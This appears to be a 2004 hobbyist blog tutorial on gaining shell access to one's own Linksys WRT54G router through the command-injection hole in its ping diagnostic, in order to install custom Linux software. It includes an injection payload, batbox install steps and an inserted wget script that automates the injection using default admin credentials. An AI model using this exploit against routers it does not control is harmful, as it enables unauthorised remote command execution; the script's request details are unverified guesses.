Welcome to the CSIR Meraka Institute's "COIN" Blog

Tuesday, August 17, 2004

My experience getting a shell prompt on the Linksys WRT54G

This amazing little cheap wireless router can be customized with a new version of Linux or extra user applications by making use of what is commonly called the PING backdoor. It is really a command injection: the ping diagnostic in the router's httpd service hands whatever you type in the target field to a shell along with the ping command, so you can run arbitrary commands on the box through it.

Step 1:

Connect the box to your computer by plugging the supplied Ethernet cable into a free network port on your PC and into one of the 4 LAN ports on the Linksys (not the port labelled Internet).

Step 2:

Make sure the PC interface you are using has DHCP enabled. Your machine will be given an IP address in the range 192.168.1.x; the Linksys is always 192.168.1.1 by default. Try to ping the Linksys box:

# ping 192.168.1.1

Step 3:

Open a web browser (make sure your proxy is turned off, or set a proxy exception for 192.168.1.1) and open the Linksys web administration page at the following URL:

http://192.168.1.1

Browse around here and check out some of its features.

Step 4:

Now it's time to test out the PING backdoor:

Go to the Administration - Diagnostics screen and click on Ping.
In the box "IP Address or Domain Name:", type

'ls>/tmp/ping.log"

The Diagnostics page displays /tmp/ping.log, the file the ping output normally goes to, so redirecting the command's output there makes the directory listing show up where the ping results would. Exactly which separator characters get the command past the ping argument depends on the firmware version; later Linksys firmware changed or closed this hole.

Wow - who would have thought you can execute commands on the box using ping? This backdoor is what the batbox script in the following steps uses to access the box and upload programs to it.
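The injection from Step 4 can also be driven from the host without a browser, which is essentially what the batbox script does for you later. The script below is an added example, not the page's, batbox's or Linksys's own code. Everything about the request is an assumption not stated on the page: that the diagnostic form is POSTed to /Ping.asp with the target in a field named ping_ip (plus ping_times and submit_button), that the router's httpd runs the target through a shell so a leading `;` separates the injected command from the ping arguments, that the Diagnostics page prints /tmp/ping.log back afterwards, and that the web interface uses HTTP basic auth with the admin password. Adjust the path, field names and separator to the firmware you actually have; the page's own payload uses different surrounding characters.

```shell
#!/bin/sh
# Added example, not batbox or Linksys code. Drives the WRT54G ping
# diagnostic injection from the host with GNU wget. Assumed (not from the
# page): form path /Ping.asp, fields ping_ip/ping_times/submit_button,
# a ';' separator working on the router's shell command line, and the
# Diagnostics page printing /tmp/ping.log back.
set -u

ROUTER=${ROUTER:-192.168.1.1}
RUSER=${ROUTER_USER:-admin}          # web admin user (factory default)
PASSWORD=${ROUTER_PASSWORD:-admin}   # same value batbox's PASSWORD= line uses

# Percent-encode a string for an application/x-www-form-urlencoded body.
# Everything outside [A-Za-z0-9._~-] becomes %XX, so the shell
# metacharacters in the injected command survive the HTTP layer intact.
urlencode() {
    s=$1
    out=""
    while [ -n "$s" ]; do
        rest=${s#?}          # drop the first character ...
        c=${s%"$rest"}       # ... and keep it
        s=$rest
        case "$c" in
            [A-Za-z0-9._~-]) out="$out$c" ;;
            *) out="$out$(printf '%%%02X' "'$c")" ;;
        esac
    done
    printf '%s' "$out"
}

# Turn a command into the ping target: ';' ends the ping invocation and the
# command's output is redirected into /tmp/ping.log, which the Diagnostics
# page shows instead of the ping results.
inject_payload() {
    printf ';%s >/tmp/ping.log' "$1"
}

# Full form body for one request (field names are an assumption).
ping_form_body() {
    printf 'ping_ip=%s&ping_times=1&submit_button=Ping' \
        "$(urlencode "$(inject_payload "$1")")"
}

# Submit the command and print what the router wrote to /tmp/ping.log.
# This is the only function that touches the network.
run_on_router() {
    wget --quiet -O /dev/null \
        --http-user="$RUSER" --http-password="$PASSWORD" \
        --post-data="$(ping_form_body "$1")" \
        "http://$ROUTER/Ping.asp" || return 1
    sleep 2    # the httpd may run the command in the background
    wget --quiet -O - \
        --http-user="$RUSER" --http-password="$PASSWORD" \
        "http://$ROUTER/Ping.asp"
}

# Usage: ./wrt54g-ping-cmd.sh 'ls -la /tmp'   (prints the listing)
if [ -n "${1:-}" ]; then
    run_on_router "$*"
fi
```

The encoding step is the part people get wrong by hand: a raw `>` or `;` in the form body is exactly what the browser would have escaped for you, and without percent-encoding the httpd may never see the metacharacters that make the injection work.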

Step 5:

Download and configure the batbox installation from one of these locations:

Batbox site (there seems to be a problem with its DNS at the moment)
Local site (alternative location)

Extract it with

# gunzip < wrt54g-0.51.tar.gz.tar | tar xvf -

Look at the README file, then edit the script wrt54g.sh and make the following changes. Set PASSWORD to the router's web admin password (admin is the factory default):

PASSWORD=admin

If you have Java installed you can leave the rest of the script as is. If you don't have Java but do have wget installed, uncomment the lines

# PROGRAM="wget --quiet ....
# EXTRA="" ....

If you have neither wget nor Java installed, install one of them. If you are using Cygwin, make sure ttcp is installed and copy the ttcp program from /usr/bin to the current wrt54g directory.

Step 6:

Execute the script:

# ./wrt54g.sh

After the script finishes, you should be able to telnet to the box:

# telnet 192.168.1.1

The script also installs a new page on the web server; open it at the following URL

http://192.168.1.1:8000/

Step 7:

Get the cross-compiler tools for MIPS from

Batbox site

and start compiling and testing your own applications ...
Soon to follow: instructions on transferring your own applications to the box, based on the batbox script.
